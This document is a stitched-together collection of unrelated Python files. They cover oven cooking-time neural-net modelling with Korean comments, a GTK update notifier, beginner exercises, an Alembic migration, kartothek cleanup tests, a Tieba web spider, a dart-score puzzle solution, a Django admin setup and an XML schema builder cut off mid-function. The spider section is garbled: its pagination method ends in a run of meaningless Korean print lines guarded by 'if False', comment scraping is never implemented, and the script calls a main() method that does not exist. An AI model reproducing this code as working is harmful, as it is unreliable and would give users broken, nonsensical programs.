NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1])
(400000**(1/2))/60 # 대략 +-10분정도의 차이를 보임
"""------------------------------------------------------------------------------------------------------
### 4. NN (user charicteristics + menu + accumulate/recent session variables + recent cooktime)
------------------------------------------------------------------------------------------------------"""
## 4-1. recent cooktime 변수 DF 생성
oven_rct = pd.read_csv('Oven_sample.csv', encoding='euc-kr')
oven_rct['Cookingtime'] = oven_rct['Cook_hour']*60*60 + oven_rct['Cook_min']*60 + oven_rct['Cook_sec']
oven_rct = oven_rct.loc[oven_rct['EVENT'] == '요리시작',]
oven_rct = oven_rct.loc[oven_rct['Cook_menu'].isin(menu),]
oven_rct['recent_ct'] = 0
df = pd.DataFrame()
for i in list(set(oven_rct.DEVICE_ID)) :
df0 = oven_rct.loc[oven_rct['DEVICE_ID'] == i,:]
df0 = df0.sort_values(by='LOCAL_TIME')
for j in range(1,df0.shape[0]) :
df1 = df0.copy(deep=True)
df2 = df1.iloc[:j,:]
k = list(df2.loc[df2['Cook_menu'] == df1.iloc[j,6],'Cookingtime']) if (df1.iloc[j,6] in list(set(df2['Cook_menu']))) else [0]
k = k[len(k)-1]
df0.iloc[j,13] = k
df = df.append(df0)
oven_rct = df.copy(deep=True)
oven_rct = oven_rct.reset_index(drop=True)
del i, j, df0, df1, k, df, df2
df = pd.read_csv('ctPred3_preprocessing.csv', encoding='euc-kr')
df = pd.concat([df,oven_rct.iloc[:,-1]],axis=1)
ctPred3 = pd.merge(oven_c,df, left_on = 'DEVICE_ID', right_on = 'DEVICE_ID', how = 'inner')
ctPred3 = ctPred3.sort_values(by=['DEVICE_ID','LOCAL_TIME'])
# menu를 가나다순으로 0-27까지 레이블링
for i in range(len(ctPred3.iloc[:,0])) :
k = ctPred3.iloc[i,23]
num = menu.index(k)
ctPred3.iloc[i,23] = num
del k, num, i
ctPred3['time'] = 0
for i in range(len(ctPred3.iloc[:,0])) :
ctPred3.iloc[i,31] = int(ctPred3.iloc[i,22][11:13]) # time 변수 생성
del i
del ctPred3['LOCAL_TIME'], ctPred3['DEVICE_ID']
# column 순서 변경 (Cookingtime = Y 를 끝으로)
cols = ctPred3.columns.tolist()
cols = cols[:cols.index('Cookingtime')] + cols[cols.index('Cookingtime')+1:]
cols.append('Cookingtime')
ctPred3 = ctPred3[cols]
cols = ctPred3.columns.tolist()
cols[len(cols)-1] = 'Y'
ctPred3.columns = cols
del cols
ctPred3.to_csv('ctPred3.csv', header=True, index=False)
## 4-2. NeuralNet modeling3
ctPred3 = pd.read_csv('ctPred3.csv')
# train_test_split
train, test = train_test_split(ctPred3, test_size = 0.2)
# make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1)))
NN.add(keras.layers.Dense(18, activation = "relu"))
NN.add(keras.layers.Dense(9, activation = "relu"))
NN.add(keras.layers.Dense(1, activation = None))
Adam = keras.optimizers.Adam(learning_rate = 0.001)
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse'])
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 800, batch_size=10)
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1])
(320000**(1/2))/60 # 대략 +-10분정도의 차이를 보임
"""--------------------------------------------------------------------------------------------------------------------
### 5. NN by selected variables (selected user charicteristics + accumulate/recent session variables + recent cooktime)
--------------------------------------------------------------------------------------------------------------------"""
ctPred4 = ctPred3.iloc[:,[1,2,3,4,5,16,20,21,22,23,24,25,26,27,28,29]]
# train_test_split
train, test = train_test_split(ctPred4, test_size = 0.2)
# make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1)))
NN.add(keras.layers.Dense(7, activation = "relu"))
NN.add(keras.layers.Dense(1, activation = None))
Adam = keras.optimizers.Adam(learning_rate = 0.001)
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse'])
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 150, batch_size=10)
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1])
(600000**(1/2))/60 # 대략 +-12분정도의 차이를 보임
"""------------------------------------------------------------------------------------------------------
### 6. NN by menu (user charicteristics + accumulate/recent session variables + recent cooktime)
------------------------------------------------------------------------------------------------------"""
## 6-1. 요리횟수가 첫번째로 많은 메뉴(군고구마)
ctPred5_7 = ctPred3.loc[ctPred3['Cook_menu'] == 7, ctPred3.columns != 'Cook_menu']
# train_test_split
train, test = train_test_split(ctPred5_7, test_size = 0.2)
# make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1)))
NN.add(keras.layers.Dense(18, activation = "relu"))
NN.add(keras.layers.Dense(9, activation = "relu"))
NN.add(keras.layers.Dense(1, activation = None))
Adam = keras.optimizers.Adam(learning_rate = 0.001)
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse'])
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 300, batch_size=10)
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1])
## 6-2. 요리횟수가 두번째로 많은 메뉴(냉동밥데우기)
ctPred5_12 = ctPred3.loc[ctPred3['Cook_menu'] == 12, ctPred3.columns != 'Cook_menu']
# train_test_split
train, test = train_test_split(ctPred5_12, test_size = 0.2)
# make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1)))
NN.add(keras.layers.Dense(18, activation = "relu"))
NN.add(keras.layers.Dense(9, activation = "relu"))
NN.add(keras.layers.Dense(1, activation = None))
Adam = keras.optimizers.Adam(learning_rate = 0.001)
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse'])
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 100, batch_size=10)
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1])
"""------------------------------------------------------------------------------------------------------
### 7. mse of naive rule
------------------------------------------------------------------------------------------------------"""
# 이전에 해당 메뉴를 요리한 경험이 있으면 이전 설정시간을,
# 아니면 해당 메뉴의 expected cooktime을 추천하는 방식
## 7-1. 모든 메뉴에 대한 naive rule 적용
(np.mean((ctPred3['Y'] - ctPred3['recent_ct'])**(2)))**(1/2)/60
# naive한 방식으로 모든 메뉴를 예측하면 22분정도 오차
## 7-2. 개별 메뉴에 대한 naive rule 적용
# 군고구마
df = ctPred5_7.copy(deep=True)
df.loc[df['recent_ct'] == 0,'recent_ct'] = 1725.72
np.mean((df.Y-df.recent_ct)**2)/60
# 냉동밥데우기
df = ctPred5_12.copy(deep=True)
df.loc[df['recent_ct'] == 0,'recent_ct'] = 186.44
np.mean((df.Y-df.recent_ct)**2)/60
# naive한 방식으로 예측하면 23분, 15분정도 오차 |
#!/usr/bin/env python
#
# System tray notifier for sboui updates. Source code adapted from
# salix-update-notifier by George Vlahavas (gapan).
import gtk
import sys
def accept(data=None):
    """Menu/icon callback: exit with status 0 (launch the sboui updater)."""
    raise SystemExit(0)
def dismiss(data=None):
    """Menu callback: exit with status 1 (ignore the updates for now)."""
    raise SystemExit(1)
def quit(data=None):
    """Menu callback: exit with status 2 (don't remind again).

    NOTE: intentionally keeps the name `quit` (it shadows the builtin)
    because make_menu connects to it by this name.
    """
    raise SystemExit(2)
def make_menu(event_button, event_time, data=None):
    """Build the three-entry right-click menu and pop it up.

    Entries: launch the updater, dismiss for now, never remind again --
    wired to accept/dismiss/quit respectively.
    """
    menu = gtk.Menu()
    entries = (
        ('system-run', 'Launch sboui updater', accept, "Accept"),
        ('window-close', 'Ignore for now', dismiss, "Dismiss"),
        ('application-exit', 'Don\'t remind me again', quit, "Quit"),
    )
    for icon_name, label, callback, cb_data in entries:
        image = gtk.Image()
        image.set_from_icon_name(icon_name, gtk.ICON_SIZE_MENU)
        item = gtk.ImageMenuItem(label)
        item.set_image(image)
        menu.append(item)
        item.connect_object("activate", callback, cb_data)
        item.show()
    menu.popup(None, None, None, event_button, event_time)
def on_right_click(data, event_button, event_time):
    # 'popup-menu' signal handler: show the three-item action menu.
    make_menu(event_button, event_time)
def on_left_click(event):
    # 'activate' signal handler: a left click launches the updater (exit 0).
    accept()
if __name__ == '__main__':
    # Create the tray icon from the installed "sboui" theme icon.
    icon = gtk.status_icon_new_from_icon_name("sboui")
    icon.set_tooltip_text('SBo updates are available')
    icon.connect('popup-menu', on_right_click)  # right click: action menu
    icon.connect('activate', on_left_click)     # left click: launch updater
    gtk.main()
|
# With break statement: stops the loop entirely when count reaches 4.
count = 0
while count < 5:
    count = count + 1
    # BUG FIX: `is` compares object identity, not value (and `x is 4` is a
    # SyntaxWarning on Python 3.8+); use == for integer comparison.
    if count == 4:
        break
    print("count")
# With continue statement: skips only the iteration where count is 4.
count = 0
while count < 5:
    count = count + 1
    if count == 4:
        continue
    print("count")
|
"""Add ix_test_start_time_status_lower
Revision ID: 9c00de5646cd
Revises: d5e936a5835e
Create Date: 2017-08-01 14:25:16.846453
"""
# revision identifiers, used by Alembic.
revision = '9c00de5646cd'       # this migration
down_revision = 'd5e936a5835e'  # parent migration
from alembic import op
import sqlalchemy as sa
def upgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Composite expression index on "test": newest start_time first, plus
    # lower(status::text) for case-insensitive status matching (PostgreSQL).
    op.create_index('ix_test_start_time_status_lower', 'test', [sa.text('start_time DESC'), sa.text('lower(status::text)')], unique=False)
    # ### end Alembic commands ###
def downgrade():
    """Drop the index created by upgrade()."""
    # ### commands auto generated by Alembic - please adjust! ###
    # Pass table_name as well: some dialects (e.g. MySQL) require the owning
    # table to drop an index, and it keeps autogenerate comparisons accurate.
    op.drop_index('ix_test_start_time_status_lower', table_name='test')
    # ### end Alembic commands ###
|
# For the exercise, look up the methods and functions that are available for use
# with Python lists.
x = [1, 2, 3]
y = [8, 9, 10]
# For the following, DO NOT USE AN ASSIGNMENT (=).
# Change x so that it is [1, 2, 3, 4]
x.append(4)  # append mutates in place and returns None, so printing it is pointless
# Using y, change x so that it is [1, 2, 3, 4, 8, 9, 10]
x.extend(y)  # extend appends every element of y
# Change x so that it is [1, 2, 3, 4, 9, 10]
x.pop(4)  # pop removes (and returns) the element at index 4, which is 8
# x.remove(8) would also work: remove takes the value to delete, not an index
# Change x so that it is [1, 2, 3, 4, 9, 99, 10]
# BUG FIX: extend([99, 10]) appended to the end, producing
# [1, 2, 3, 4, 9, 10, 99, 10]; insert places 99 before index 5 as required.
x.insert(5, 99)
# Print the length of list x
print(len(x))
# Print all the values in x multiplied by 1000
newlist = []
for i in x:
    newlist.append(i * 1000)
print(newlist)  # BUG FIX: was the Python-2 statement `print newlist` (SyntaxError on Python 3)
# x[:] = [item * 1000 for item in x]
# list comprehension would do the multiplication in place
# print(x)
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--fasta', type=str)
parser.add_argument('--start', type=int)
parser.add_argument('--end', type=int)
args = parser.parse_args()

# Finds Chi-site coordinates for the + and - strands within a given interval.
with open(args.fasta, 'r', encoding='utf-8') as inp:
    # Concatenate all sequence lines, skipping FASTA headers.
    # (join avoids the quadratic cost of repeated string +=)
    data = ''.join(line.strip() for line in inp if not line.startswith('>'))

genome_subset = data[args.start:args.end]
# PERF FIX: str.startswith(motif, n) tests position n directly; the original
# `find(motif, n) == n` scanned ahead from n on every miss, which is
# accidentally quadratic over the subset.
plus_strand = [n + args.start for n in range(len(genome_subset)) if genome_subset.startswith("GCTGGTGG", n)]
minus_strand = [n + args.start for n in range(len(genome_subset)) if genome_subset.startswith("CCACCAGC", n)]

# Write one (start, end) pair per site; Chi motifs are 8 bp long.
with open('plus_chi.tsv', 'w') as out:
    for i in plus_strand:
        out.write(f'{i}\t{i+8}\n')
with open('minus_chi.tsv', 'w') as out:
    for i in minus_strand:
        out.write(f'{i}\t{i+8}\n')
|
# -*- coding: utf-8 -*-
import pandas as pd
import pytest
from kartothek.core.cube.constants import KTK_CUBE_UUID_SEPERATOR
from kartothek.core.cube.cube import Cube
from kartothek.io.eager_cube import build_cube, copy_cube
# Explicit public API: star-imports of this module pick up exactly these tests.
__all__ = (
    "test_additional_files",
    "test_delete_by_correct_uuid",
    "test_fail_blocksize_negative",
    "test_fail_blocksize_wrong_type",
    "test_fail_blocksize_zero",
    "test_fails_no_store_factory",
    "test_missing_cube_files",
    "test_missing_metadata",
    "test_missing_seed_dataset",
    "test_noop",
    "test_overwrite_check_with_copy",
)
def test_delete_by_correct_uuid(driver, function_store):
    """Running the driver on cube "foo" must leave cube "foo_bar" untouched,
    even though "foo" is a string prefix of "foo_bar"."""
    seed_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
    )
    enrich_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
    )
    cube_foo = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="foo")
    cube_foo_bar = Cube(
        dimension_columns=["x"], partition_columns=["p"], uuid_prefix="foo_bar"
    )
    # Build both cubes with identical contents.
    for target in (cube_foo, cube_foo_bar):
        build_cube(
            data={target.seed_dataset: seed_df, "enrich": enrich_df},
            cube=target,
            store=function_store,
        )
    store = function_store()
    foo_bar_keys = {k for k in store.keys() if "foo_bar" in k}
    # Remove the dataset metadata of cube "foo" by hand.
    store.delete("foo++seed.by-dataset-metadata.json")
    store.delete("foo++enrich.by-dataset-metadata.json")
    driver(cube=cube_foo, store=function_store)
    # Only the keys belonging to "foo_bar" may remain.
    assert foo_bar_keys == set(store.keys())
def test_missing_seed_dataset(driver, function_store):
    """With the seed payload files removed by hand, running the driver must
    leave exactly the enrich keys in the store."""
    seed_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
    )
    enrich_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
    )
    cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
    build_cube(
        data={cube.seed_dataset: seed_df, "enrich": enrich_df},
        cube=cube,
        store=function_store,
    )
    store = function_store()
    all_keys = set(store.keys())
    # Payload keys of the seed dataset (contain "/"), vs. every enrich key.
    seed_payload_keys = {k for k in all_keys if "cube++seed" in k and "/" in k}
    enrich_keys = {k for k in all_keys if "cube++enrich" in k}
    for key in seed_payload_keys:
        store.delete(key)
    driver(cube=cube, store=function_store)
    assert enrich_keys == set(store.keys())
def test_missing_cube_files(driver, function_store):
    """With the enrich payload files removed by hand, running the driver must
    also remove the orphaned enrich dataset metadata."""
    seed_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
    )
    enrich_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
    )
    cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
    build_cube(
        data={cube.seed_dataset: seed_df, "enrich": enrich_df},
        cube=cube,
        store=function_store,
    )
    store = function_store()
    # Payload keys of the enrich dataset (contain "/").
    enrich_payload_keys = {k for k in store.keys() if "cube++enrich" in k and "/" in k}
    for key in enrich_payload_keys:
        store.delete(key)
    driver(cube=cube, store=function_store)
    assert "cube++enrich.by-dataset-metadata.json" not in store.keys()
def test_missing_metadata(driver, function_store):
    """With the enrich dataset metadata removed by hand, running the driver
    must leave none of the enrich keys behind."""
    seed_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
    )
    enrich_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
    )
    cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
    build_cube(
        data={cube.seed_dataset: seed_df, "enrich": enrich_df},
        cube=cube,
        store=function_store,
    )
    store = function_store()
    enrich_keys = {k for k in store.keys() if "cube++enrich" in k}
    store.delete("cube++enrich.by-dataset-metadata.json")
    driver(cube=cube, store=function_store)
    assert not enrich_keys.intersection(store.keys())
def test_noop(driver, function_store):
    """Cleanup on an intact cube must not touch a single key."""
    seed_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
    )
    enrich_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
    )
    cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
    build_cube(
        data={cube.seed_dataset: seed_df, "enrich": enrich_df},
        cube=cube,
        store=function_store,
    )
    keys_before = set(function_store().keys())
    driver(cube=cube, store=function_store)
    assert set(function_store().keys()) == keys_before
def test_overwrite_check_with_copy(driver, function_store, function_store2):
    """After an overwrite, cleanup reduces the store to exactly the live key set.

    The live set is detected by copying the cube into a second, fresh store.
    """
    seed_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
    )
    enrich_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
    )
    cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
    # Build the cube twice so the first build leaves stale keys behind.
    build_cube(
        data={cube.seed_dataset: seed_df, "enrich": enrich_df},
        cube=cube,
        store=function_store,
    )
    build_cube(
        data={cube.seed_dataset: seed_df, "enrich": enrich_df},
        cube=cube,
        store=function_store,
        overwrite=True,
    )
    # The copy only transfers live keys, so the target store is the reference.
    copy_cube(cube=cube, src_store=function_store, tgt_store=function_store2)
    live_keys = set(function_store2().keys())
    assert set(function_store().keys()) != live_keys
    driver(cube=cube, store=function_store)
    assert set(function_store().keys()) == live_keys
def test_additional_files(driver, function_store):
    """Stray keys inside the cube namespace are removed, unrelated prefixes survive."""
    seed_df = pd.DataFrame(
        {"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
    )
    cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
    build_cube(data=seed_df, cube=cube, store=function_store)
    key_in_ds = cube.ktk_dataset_uuid(cube.seed_dataset) + "/foo"
    key_with_ds_prefix = cube.ktk_dataset_uuid(cube.seed_dataset) + ".foo"
    key_with_cube_prefix = cube.uuid_prefix + ".foo"
    key_with_cube_prefix_separator = cube.uuid_prefix + KTK_CUBE_UUID_SEPERATOR + ".foo"
    stray_keys = (
        key_in_ds,
        key_with_ds_prefix,
        key_with_cube_prefix,
        key_with_cube_prefix_separator,
    )
    for key in stray_keys:
        function_store().put(key, b"")
    driver(cube=cube, store=function_store)
    remaining = set(function_store().keys())
    assert key_in_ds not in remaining
    assert key_with_ds_prefix not in remaining
    # A plain cube prefix without the separator is outside the cube namespace.
    assert key_with_cube_prefix in remaining
    assert key_with_cube_prefix_separator not in remaining
def test_fails_no_store_factory(driver, function_store, skip_eager):
    """Passing a concrete store instead of a factory must raise a TypeError."""
    cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
    concrete_store = function_store()
    with pytest.raises(TypeError) as exc:
        driver(cube=cube, store=concrete_store, no_run=True)
    assert str(exc.value) == "store must be a factory but is HFilesystemStore"
def test_fail_blocksize_wrong_type(driver, function_store, skip_eager):
    """A non-integer blocksize is rejected with a TypeError."""
    cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
    with pytest.raises(TypeError, match="blocksize must be an integer but is str"):
        driver(cube=cube, store=function_store, blocksize="foo")
def test_fail_blocksize_negative(driver, function_store, skip_eager):
    """A negative blocksize is rejected with a ValueError."""
    cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
    with pytest.raises(ValueError, match="blocksize must be > 0 but is -1"):
        driver(cube=cube, store=function_store, blocksize=-1)
def test_fail_blocksize_zero(driver, function_store, skip_eager):
    """A zero blocksize is rejected with a ValueError."""
    cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
    with pytest.raises(ValueError, match="blocksize must be > 0 but is 0"):
        driver(cube=cube, store=function_store, blocksize=0)
|
def print19(start, end):
    """Print the integers from start to end (inclusive), space-separated, then a newline."""
    for value in range(start, end + 1):
        print(value, end=" ")
    print("")
# Read a start and an end value; print the range only when start < end.
s=int(input("시작:"))
e=int(input("끝:"))
if s<e:
    # NOTE(review): the s == e case prints nothing — confirm that is intended.
    print19(s,e)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import urllib.request
import bs4
import re
from sqlConnector import mySql_Connector as sql
class webPageSpider:
    """Crawler for Baidu Tieba thread pages.

    Fetches thread pages listed in the database (via the project's ``sql``
    module), extracts the original post and all comments, and stores them
    back into the database.
    """
    # Initialiser (no state is kept on the instance).
    def __init__(self):
        pass
    # String filter: strip characters outside the Basic Multilingual Plane
    # (e.g. emoji) that the database encoding cannot store.
    def checkStr(self, String):
        try:
            # Handling on Python UCS-4 builds: match astral-plane code points directly.
            highpoints = re.compile(u'[\U00010000-\U0010ffff]')
        except re.error:
            # Handling on Python UCS-2 builds: match surrogate pairs instead.
            highpoints = re.compile(u'[\uD800-\uDBFF][\uDC00-\uDFFF]')
        resovle_value = highpoints.sub(u'', String)
        return resovle_value
    # Download a Tieba page and parse it into a BeautifulSoup tree.
    def urlOpen(self, url):
        req = urllib.request.Request(url)
        response = urllib.request.urlopen(req)
        html = response.read().decode('utf-8', 'ignore')
        bsHtml = bs4.BeautifulSoup(html, 'html5lib')
        return bsHtml
    # Validated urlOpen: return 404 for deleted/unreachable pages, else the soup.
    def checkedUrlOpen(self, url):
        bsHtml = self.urlOpen(url)
        # NOTE(review): urlOpen never returns 404 itself, so this first branch
        # looks unreachable — confirm whether urlOpen was meant to catch HTTPError.
        if bsHtml == 404:
            return 404
        elif bsHtml.find('body', {'class': 'page404'}):
            return 404
        else:
            return bsHtml
    # Scrape everything needed about the original poster (OP) of the thread.
    def webPageUpInformation(self, bsHtml, url):
        # Thread title
        web_titleName = bsHtml.find('h1', {'class': {'core_title_txt ', 'core_title_txt member_thread_title_pb '}})
        titleName = self.checkStr(web_titleName.get_text(strip=True))
        # Author of the thread
        web_upName = bsHtml.find('a',
                                 {'class': {'p_author_name j_user_card', 'p_author_name sign_highlight j_user_card'}})
        upName = self.checkStr(web_upName.get_text(strip=True))
        # Body text of the original post
        web_upEssay = bsHtml.find('div', {'class': 'd_post_content j_d_post_content clearfix'})
        upEssay = self.checkStr(web_upEssay.get_text(strip=True))
        # Posting time, taken from the JSON blob in the post's data-field attribute
        web_essayTime = bsHtml.find('div', {'class': 'l_post j_l_post l_post_bright noborder '})
        web_essayTimeJson = json.loads(web_essayTime['data-field'])
        essayTime = web_essayTimeJson.get('content').get('date')
        # Number of replies
        web_commentsNum = bsHtml.find('li', {'class': 'l_reply_num'}).find('span', {'style': 'margin-right:3px'})
        commentsNum = int(web_commentsNum.get_text(strip=True))
        # Print the title as progress output
        print(titleName)
        # Persist the thread record
        sql.insertPageValues(url, titleName, upName, upEssay, essayTime, commentsNum)
    # Scrape all comments, following pagination where needed.
    def webPageCommentsInformation_crossPage(self, bsHtml, url):
        commentsList = set()
        web_pageNum = bsHtml.find('li', {'class': 'l_reply_num'}).findAll('span', {'class': 'red'})
        pageNum = int(web_pageNum[1].get_text(strip=True))
        # Print the page count as progress output
        print('총공유' + str(pageNum) + '페') if False else print('총 ' + '' ) if False else None
        print('총공' ) if False else None
        print('총공유') if False else None
        print('총') if False else None
        print('총공유페이지') if False else None
        print('총공유페이지수') if False else None
        print('총공유페이지수출력') if False else None
# Script entry point: crawl every not-yet-visited URL recorded in the database.
if __name__ == '__main__':
    page = webPageSpider()
    page.main()
|
# 다트 게임은 총 3번의 기회로 구성된다.
# 각 기회마다 얻을 수 있는 점수는 0점에서 10점까지이다.
# 점수와 함께 Single(S), Double(D), Triple(T) 영역이 존재하고 각 영역 당첨 시 점수에서 1제곱, 2제곱, 3제곱 (점수1 , 점수2 , 점수3 )으로 계산된다.
# 옵션으로 스타상(*) , 아차상(#)이 존재하며 스타상(*) 당첨 시 해당 점수와 바로 전에 얻은 점수를 각 2배로 만든다.
# 아차상(#) 당첨 시 해당 점수는 마이너스된다.
# 스타상(*)은 첫 번째 기회에서도 나올 수 있다. 이 경우 첫 번째 스타상(*)의 점수만 2배가 된다. (예제 4번 참고)
# 스타상(*)의 효과는 다른 스타상(*)의 효과와 중첩될 수 있다. 이 경우 중첩된 스타상(*) 점수는 4배가 된다. (예제 4번 참고)
# 스타상(*)의 효과는 아차상(#)의 효과와 중첩될 수 있다. 이 경우 중첩된 아차상(#)의 점수는 -2배가 된다. (예제 5번 참고)
# Single(S), Double(D), Triple(T)은 점수마다 하나씩 존재한다.
# 스타상(*), 아차상(#)은 점수마다 둘 중 하나만 존재할 수 있으며, 존재하지 않을 수도 있다.
# 0~10의 정수와 문자 S, D, T, *, #로 구성된 문자열이 입력될 시 총점수를 반환하는 함수를 작성하라.
# 입력 형식
# "점수|보너스|[옵션]"으로 이루어진 문자열 3세트.
# 예) 1S2D*3T
# 점수는 0에서 10 사이의 정수이다.
# 보너스는 S, D, T 중 하나이다.
# 옵선은 *이나 # 중 하나이며, 없을 수도 있다.
# 출력 형식
# 3번의 기회에서 얻은 점수 합계에 해당하는 정수값을 출력한다.
# 예) 37
# 입출력 예제
# 예제 dartResult answer 설명
# 1 1S2D*3T 37 1^1 * 2 + 2^2 * 2 + 3^3
# 2 1D2S#10S 9 1^2 + 2^1 * (-1) + 10^1
# 3 1D2S0T 3 1^2 + 2^1 + 0^3
# 4 1S*2T*3S 23 1^1 * 2 * 2 + 2^3 * 2 + 3^1
# 5 1D#2S*3S 5 1^2 * (-1) * 2 + 2^1 * 2 + 3^1
# 6 1T2D3D# -4 1^3 + 2^2 + 3^2 * (-1)
# 7 1D2S3T* 59 1^2 + 2^1 * 2 + 3^3 * 2
import re
dartResult = '1S2D*3T'  # sample input (expected answer: 37)
def solution(dartResult):
    """Return the total score of a dart game string like ``'1S2D*3T'``.

    Each throw is ``<score><bonus><option>``:
    - score: integer 0..10
    - bonus: S/D/T raises the score to the 1st/2nd/3rd power
    - option: '*' doubles this throw AND the previous one; '#' negates this throw
    """
    bonus = {'S': 1, 'D': 2, 'T': 3}
    option = {'': 1, '*': 2, '#': -1}
    # (\d+) handles two-digit scores such as 10; option may be absent.
    throws = re.findall(r'(\d+)([SDT])([*#]?)', dartResult)
    scores = []
    for score, area, opt in throws:
        if opt == '*' and scores:
            # A star also doubles the previous throw's already-final score,
            # so star/option effects stack naturally across throws.
            scores[-1] *= 2
        scores.append(int(score) ** bonus[area] * option[opt])
    return sum(scores)
print(solution(dartResult)) # expected output: 37
# (\d+)   : an integer (also matches 10 and above); + means one or more digits
# ([SDT]) : exactly one bonus letter: S, D or T
# ([*#]?) : an optional option character * or #; ? means zero or one occurrence
import re
# Regex accepting a non-negative integer and nothing else.
pat = r'^\d+$'
x = input()
# BUGFIX: the original validated the undefined name ``n`` (NameError) and
# never parsed the count into ``n`` before using it in ``range(n)`` below.
if bool(re.match(pat, x)):
    n = int(x)
    flag = True
    ar = list(input().split())
    for i in ar:
        # Every element must itself be a non-negative integer.
        if not bool(re.match(pat, i)):
            print("Invalid")
            flag = False
            break
    if flag:
        # Collect every index i whose element equals i ("fixed points").
        # NOTE(review): assumes len(ar) >= n; otherwise this raises IndexError.
        ans = []
        for i in range(n):
            if i == int(ar[i]):
                ans.append(i)
        if len(ans) == 0:
            print(-1)
        else:
            print(*ans)
else:
    print("Invalid")
|
from django.contrib import admin
from accounts.models import Contact_Information, Days
class ContactInline(admin.TabularInline):
    """Inline editor for Days rows shown inside the contact admin page."""
    model = Days
    # Number of empty extra forms rendered for adding new Days entries.
    extra = 3
class ContactAdmin(admin.ModelAdmin):
    """Admin configuration for Contact_Information with inline Days editing."""
    # Columns shown on the change-list page.
    list_display = ('phone', 'office', 'email', 'github', 'bitbucket')
    inlines = (ContactInline,)
# Register the model with its custom admin class.
admin.site.register(Contact_Information, ContactAdmin)
|
import functools
import utils.minidom_fix as dom
class XML_builder:
    """Serialises an in-memory (RAM) schema representation into an XML DOM.

    The schema object is expected to expose ``domains`` and ``tables``
    collections plus descriptive attributes; ``None`` attributes are omitted
    from the generated XML. Boolean flags are collected into a comma-separated
    ``props`` attribute, matching the dbd_schema convention.
    """

    def __init__(self, schema):
        # Schema may be None; ram_to_xml() validates this before building.
        self.schema = schema

    def ram_to_xml(self):
        """Build and return the complete ``dbd_schema`` XML document.

        Raises:
            ValueError: if the builder was constructed without a schema.
        """
        if self.schema is None:
            raise ValueError("Schema is empty")
        xml = dom.Document()
        node = xml.createElement("dbd_schema")
        # Optional top-level attributes are emitted only when present.
        if self.schema.fulltext_engine is not None:
            node.setAttribute("fulltext_engine", self.schema.fulltext_engine)
        if self.schema.version is not None:
            node.setAttribute("version", self.schema.version)
        if self.schema.name is not None:
            node.setAttribute("name", self.schema.name)
        if self.schema.description is not None:
            node.setAttribute("description", self.schema.description)
        node.appendChild(xml.createElement("custom"))
        domains = xml.createElement("domains")
        createDomain = functools.partial(self._createDomainNode, xml)
        for domain in map(createDomain, self.schema.domains):
            domains.appendChild(domain)
        node.appendChild(domains)
        tables = xml.createElement("tables")
        createTable = functools.partial(self._createTableNode, xml)
        for table in map(createTable, self.schema.tables):
            tables.appendChild(table)
        node.appendChild(tables)
        xml.appendChild(node)
        return xml

    def _createDomainNode(self, xml, domain, node=None):
        """Serialise one domain into a ``<domain>`` element (or fill *node*)."""
        if node is None:
            node = xml.createElement("domain")
        if domain.name is not None:
            node.setAttribute("name", domain.name)
        if domain.description is not None:
            node.setAttribute("description", domain.description)
        if domain.type is not None:
